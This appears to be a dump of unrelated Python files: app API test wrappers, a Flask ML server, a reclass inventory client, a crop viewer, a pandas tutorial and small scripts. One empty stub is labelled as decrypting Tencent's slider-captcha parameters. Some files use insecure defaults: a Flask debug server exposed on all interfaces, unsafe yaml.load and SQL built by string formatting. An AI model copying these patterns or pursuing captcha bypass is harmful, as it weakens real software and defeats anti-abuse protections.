:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/验证学生重复生成订单"
url = f"/service-order/app/order/studentHasOrder"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单1/查询订单状态1")
def app_order_queryTest_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单1/查询订单状态1"
url = f"/service-order/app/order/queryTest"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/预占座位")
def app_order_take_seat_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/预占座位"
url = f"/service-order/app/order/take/seat"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/报名/获取可使用优惠")
def app_order_discounts_queryMatchDiscount_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/报名/获取可使用优惠"
url = f"/service-order/app/order/discounts/queryMatchDiscount"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/订单状态修改")
def app_order_updateStatus_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/订单状态修改"
url = f"/service-order/app/order/updateStatus"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/新增订单(旧)")
def app_order_save_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/新增订单(旧)"
url = f"/service-order/app/order/save"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单管理/查询订单")
def app_order_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单管理/查询订单"
url = f"/service-order/app/order/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单管理/二维码查询订单")
def app_order_qr_query_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单管理/二维码查询订单"
url = f"/service-order/app/order/qr/query"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券张数")
def app_coupon_countValidCouponItemByStudentIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券张数"
url = f"/service-order/app/coupon/countValidCouponItemByStudentIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/优惠券列表")
def app_coupon_selectCouponItemsByStudentIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/优惠券列表"
url = f"/service-order/app/coupon/selectCouponItemsByStudentIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/优惠券详情")
def app_coupon_selectCouponItemByIdForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/优惠券详情"
url = f"/service-order/app/coupon/selectCouponItemByIdForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/获取可使用优惠券")
def app_coupon_queryMatchCoupon_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/获取可使用优惠券"
url = f"/service-order/app/coupon/queryMatchCoupon"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/用户购课单/计算促销活动价格")
def app_order_calculatePromotion_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/用户购课单/计算促销活动价格"
url = f"/service-order/app/order/calculatePromotion"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
import pickle
from code import compute_model
dataset = []
with open('dataset.pickle', 'rb') as f:
dataset = pickle.load(f)
i = 0
while i < len(dataset):
j = i + 1
while j < len(dataset):
if ((dataset[i]["input"] == dataset[j]["input"]) and (dataset[i]["output"] != dataset[j]["output"])):
print("Found duplicate: ", i, " and ", j)
print(dataset[i])
print(dataset[j])
j = j + 1
i = i + 1
i = 0
for entry in dataset:
expected_output = entry["output"]
out = compute_model(entry["input"])
j = 0
while j < len(out):
if (expected_output[j] != out[j]):
print("Found mismatch in output ", j, ", expected: ", expected_output[j], ", out:", out[j])
j = j + 1
if out == expected_output:
print(i, ": matches")
else:
print(i, ": error")
i = i + 1
|
import base64
import os
import re
from flask import request, Flask, jsonify
from PIL import Image
from train import train as train
from predict import predict
from utils import decode_image
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
return "Fashion AI"
@app.route("/train", methods=["GET"])
def train_api():
model_name = request.args.get("model_name", type=str)
num_epochs = request.args.get("num_epochs", 10, type=int)
batch_size = request.args.get("batch_size", 3, type=int)
valid_size = request.args.get("test_size", 0.2, type=float)
seed = request.args.get("seed", 259, type=int)
device = request.args.get("device", "none", type=str)
num_workers = request.args.get("num_workers", -1, type=int)
use_wandb = request.args.get("use_wandb", 0, type=int)
project_name = request.args.get("project_name", "fashion_ai", type=str)
entity = request.args.get("entity", "nagahamavh", type=str)
use_tqdm = request.args.get("use_tqdm", 0, type=int)
if device == "none":
device = None
use_wandb = True if use_wandb == 1 else False
use_tqdm = True if use_tqdm == 1 else False
train(model_name, num_epochs=num_epochs, batch_size=batch_size,
valid_size=valid_size, seed=seed, device=device,
num_workers=num_workers, use_wandb=use_wandb,
project_name=project_name, entity=entity, use_tqdm=use_tqdm)
return "Modelo " + model_name + " treinado com sucesso"
@app.route("/predict", methods=["GET"])
def predict_api():
received_image = request.args.get('image')
model_name = request.args.get('model_name', type=str)
device = request.args.get("device", "none", type=str)
if device == "none":
device = None
image = decode_image(received_image)
image, info = predict(image, model_name, device)
image_pil = Image.fromarray(image)
image_pil.save("output/new_image.png")
with open("output/new_image.png", "rb") as f:
sended_image = base64.b64encode(f.read()).decode("utf-8")
return jsonify({"image": sended_image, "info": info})
@app.route("/get_models", methods=["GET"])
def get_models():
all_files = os.listdir("./pretrained_models")
all_files = [re.sub(r'\.\w+$', '', string) for string in all_files]
models = list(set(all_files))
return jsonify(models)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
|
# -*- coding: utf-8 -*-
import os
import re
import yaml
import glob
import six
from string import Template
import docutils
from collections import OrderedDict
from django.conf import settings
from reclass import get_storage
from reclass.core import Core
from reclass.settings import Settings
from architect import utils
from architect.inventory.client import BaseClient
from architect.inventory.models import Resource, Inventory
from celery.utils.log import get_logger
logger = get_logger(__name__)
class HierDeployClient(BaseClient):
def __init__(self, **kwargs):
super(HierDeployClient, self).__init__(**kwargs)
def check_status(self):
logger.info('Checking status of hierarchy deploy "{}" ...'.format(self.name))
try:
self.inventory()
status = True
except Exception as exception:
logger.error(exception)
status = False
return status
def update_resources(self):
inventory = Inventory.objects.get(name=self.name)
for resource, metadata in self.inventory().items():
res, created = Resource.objects.get_or_create(uid=resource,
inventory=inventory)
if created:
res.name = resource
res.kind = 'reclass_node'
res.metadata = metadata
res.save()
else:
if res.metadata != metadata:
res.metadata = metadata
res.save()
self.get_overrides()
def inventory(self, resource=None):
'''
Get inventory nodes from reclass salt formals and their
associated services and roles.
'''
storage = get_storage('yaml_fs',
self.metadata['node_dir'],
self.metadata['class_dir'])
settings = Settings({'no_refs': False,
'pretty_print': True,
'output': 'yaml'
})
reclass = Core(storage, None, settings)
if resource is None:
return reclass.inventory()["nodes"]
else:
return reclass.inventory()["nodes"][resource]
def parameter_list(self, resource=None):
resource_list = {}
return resource_list
def class_list(self, resource=None):
resource_list = {}
for node_name, node in self.inventory().items():
role_class = []
for service_name, service in node['parameters'].items():
if service_name not in settings.RECLASS_SERVICE_BLACKLIST:
for role_name, role in service.items():
if role_name not in settings.RECLASS_ROLE_BLACKLIST:
role_class.append('{}-{}'.format(service_name,
role_name))
resource_list[node_name] = role_class
if resource is None:
return resource_list
else:
return {resource: resource_list[resource]}
def resource_create(self, name, metadata):
file_name = '{}/{}.yml'.format(self.metadata['node_dir'], name)
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
def resource_delete(self, name):
file_name = '{}/{}.yml'.format(self.metadata['node_dir'], name)
os.remove(file_name)
inventory = Inventory.objects.get(name=self.name)
resource = Resource.objects.get(inventory=inventory, name=name)
resource.delete()
def save_override_param(self, name, value):
if 'cluster_name' not in self.metadata:
return
file_name = '{}/overrides/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
inventory = Inventory.objects.get(name=self.name)
inventory.cache['overrides'][name] = value
inventory.save()
metadata = {
'parameters': {
'_param': inventory.cache['overrides']
}
}
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
def init_overrides(self):
if 'cluster_name' not in self.metadata:
return
file_name = '{}/deployment/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
default_params = {
'cluster_name': self.metadata['cluster_name'],
'cluster_domain': self.metadata['cluster_domain']
}
metadata = {
'parameters': {
'_param': default_params
}
}
with open(file_name, 'w+') as file_handler:
yaml.safe_dump(metadata, file_handler, default_flow_style=False)
inventory = Inventory.objects.get(name=self.name)
inventory.cache['overrides'] = default_params
inventory.save()
def get_overrides(self):
if 'cluster_name' not in self.metadata:
return {}
file_name = '{}/deployment/{}.yml'.format(self.metadata['class_dir'],
self.metadata['cluster_name'],)
if not os.path.isfile(file_name):
self.init_overrides()
with open(file_name, 'r') as file_handler:
metadata = yaml.load(file_handler.read())
return metadata.get('parameters', {}).get('_param', {})
def classify_node(self, node_name, node_data={}):
'''
CLassify node by current class_mapping dictionary
'''
inventory = Inventory.objects.get(name=self.name)
node_data = {k: v for (k, v) in node_data.items() if not k.startswith('__pub_')}
classes = []
node_params = {}
cluster_params = {}
for type_name, node_type in inventory.cache.get('class_mapping', {}).items():
valid = self._validate_condition(node_data, node_type.get('expression', ''))
if valid:
gen_classes = self._get_node_classes(node_data, node_type.get('node_class', {}))
classes = classes + gen_classes
gen_node_params = self._get_params(node_data, node_type.get('node_param', {}))
node_params.update(gen_node_params)
gen_cluster_params = self._get_params(node_data, node_type.get('cluster_param', {}))
cluster_params.update(gen_cluster_params)
if classes:
node_metadata = {
'classes': classes + ['deployment.{}'.format(self.name.replace('.', '-'))],
'parameters': {
'_param': node_params,
'linux': {
'system': {
'name': node_name.split('.')[0],
'domain': '.'.join(node_name.split('.')[1:])
}
}
}
}
inventory.client().resource_create(node_name, node_metadata)
self.update_resources()
if len(cluster_params) > 0:
for name, value in cluster_params.items():
self.save_override_param(name, value)
def _get_node_classes(self, node_data, class_mapping_fragment):
classes = []
for value_tmpl_string in class_mapping_fragment.get('value_template', []):
value_tmpl = Template(value_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
rendered_value = value_tmpl.safe_substitute(node_data)
classes.append(rendered_value)
for value in class_mapping_fragment.get('value', []):
classes.append(value)
return classes
def _get_params(self, node_data, class_mapping_fragment):
params = {}
for param_name, param in class_mapping_fragment.items():
value = param.get('value', None)
value_tmpl_string = param.get('value_template', None)
if value:
params.update({param_name: value})
elif value_tmpl_string:
value_tmpl = Template(value_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
rendered_value = value_tmpl.safe_substitute(node_data)
if value_tmpl_string.replace('<<', '${').replace('>>', '}') != rendered_value:
params.update({param_name: rendered_value})
return params
def _validate_condition(self, node_data, expressions):
"""
Allow string expression definition for single expression conditions
"""
if isinstance(expressions, six.string_types):
expressions = [expressions]
result = []
for expression_tmpl_string in expressions:
expression_tmpl = Template(expression_tmpl_string.replace('<<', '${')
.replace('>>', '}'))
expression = expression_tmpl.safe_substitute(node_data)
if expression and expression == 'all':
result.append(True)
elif expression:
val_a = expression.split('__')[0]
val_b = expression.split('__')[2]
condition = expression.split('__')[1]
if condition == 'startswith':
result.append(val_a.startswith(val_b))
elif condition == 'equals':
result.append(val_a == val_b)
return all(result)
|
'''
Look at crops from an experiment, given some property filters.
'''
import config
import numpy as np
import os
from os.path import isdir, isfile, join
from lib.Database import Database
import matplotlib.pyplot as plt
import shutil
async def main(args):
await view_crops()
async def view_crops():
directory = '/home/mot/tmp/C3_cropviewer_nonvalid'
db = Database()
plt.ion()
experiment_uuid = 'b6e60b0d-ca63-4999-9f29-971b9178ad10'
diameter_low = 200
diameter_high = 700
area_low = ((diameter_low / (2.0 * 13.94736842)) ** 2) * np.pi
area_high = ((diameter_high / (2.0 * 13.94736842)) ** 2) * np.pi
s = """
SELECT p.experiment, f.frame, t.track, p.area
FROM particle p, frame f, track t
WHERE p.particle = t.particle
AND t.frame = f.frame
AND f.experiment = p.experiment
AND p.experiment = '{experiment_uuid}'
AND p.area > {area_low}
AND p.area < {area_high}
AND p.valid = True
"""
q = s.format(
experiment_uuid=experiment_uuid,
area_low=area_low,
area_high=area_high
)
async for result in db.query(q):
diameter = (2.0 * np.sqrt(result["area"] / np.pi)) * 13.94736842
# Do stuff with the rows
# Make the filename
srcFile = os.path.join(config.experiment_dir,
str(result["experiment"]),
str(result["frame"]),
str(result["track"])+'.jpg')
dstFile = os.path.join(directory, str(round(diameter))+"-"+
str(result["track"])+'.jpg')
shutil.copyfile(srcFile, dstFile)
# load the file
#img = plt.imread(srcFile)
# show the file
#plt.imshow(img, cmap='gray')
# waitfor user input
#plt.waitforbuttonpress(0)
#MSBOT-010160000003C4_VT
#35e29212-a136-4083-91d1-42b96d0bf75e (detection)
#dd6b9512-cfcb-47e9-91eb-537bff1e6d3d (tracking)
|
# -*- coding: utf-8 -*-
# __author__ = "zok" 362416272@qq.com
# Date: 2019-10-15 Python: 3.7
"""
腾讯防水墙
【不提供完整代码】
仅提供部分参数以供参考
"""
# 滑块参数解密
|
Descriptive Statistics For pandas Dataframe
Import modules
import pandas as pd
data = {'name': ['Jason', 'Molly', 'Tina', 'Jake', 'Amy'],
'age': [42, 52, 36, 24, 73],
'preTestScore': [4, 24, 31, 2, 3],
'postTestScore': [25, 94, 57, 62, 70]}
df = pd.DataFrame(data, columns = ['name', 'age', 'preTestScore', 'postTestScore'])
print(df)
df['age'].sum()
#Mean preTestScore
df['preTestScore'].mean()
#Cumulative sum of preTestScores, moving from the rows from the top
df['preTestScore'].cumsum()
#Summary statistics on preTestScore
df['preTestScore'].describe()
#Count the number of non-NA values
df['preTestScore'].count()
#Minimum value of preTestScore
df['preTestScore'].min()
#Maximum value of preTestScore
df['preTestScore'].max()
#Median value of preTestScore
df['preTestScore'].median()
#Sample variance of preTestScore values
df['preTestScore'].var()
#Sample standard deviation of preTestScore values
df['preTestScore'].std()
#Kurtosis of preTestScore values
df['preTestScore'].kurt()
#Correlation Matrix Of Values
df.corr()
#Covariance Matrix Of Values
df.cov()
|
from django.test import TestCase
from .models import StopWord
class SimpleTest(TestCase):
def test_serialization(self):
"""Tests the serialization of a StopWord
"""
s = StopWord(word='test')
self.assertEqual(s.get_stopword_dict(), {'id': s.id, 'user': '', 'query': '', 'word': s.word})
|
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
def ex3():
testlist = []
n = int(raw_input())
for i in range(0, n+1):
testlist.append(fibo(i))
print testlist[n]
def fibo(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fibo(n-2) + fibo(n-1)
if __name__ == '__main__':
ex3()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.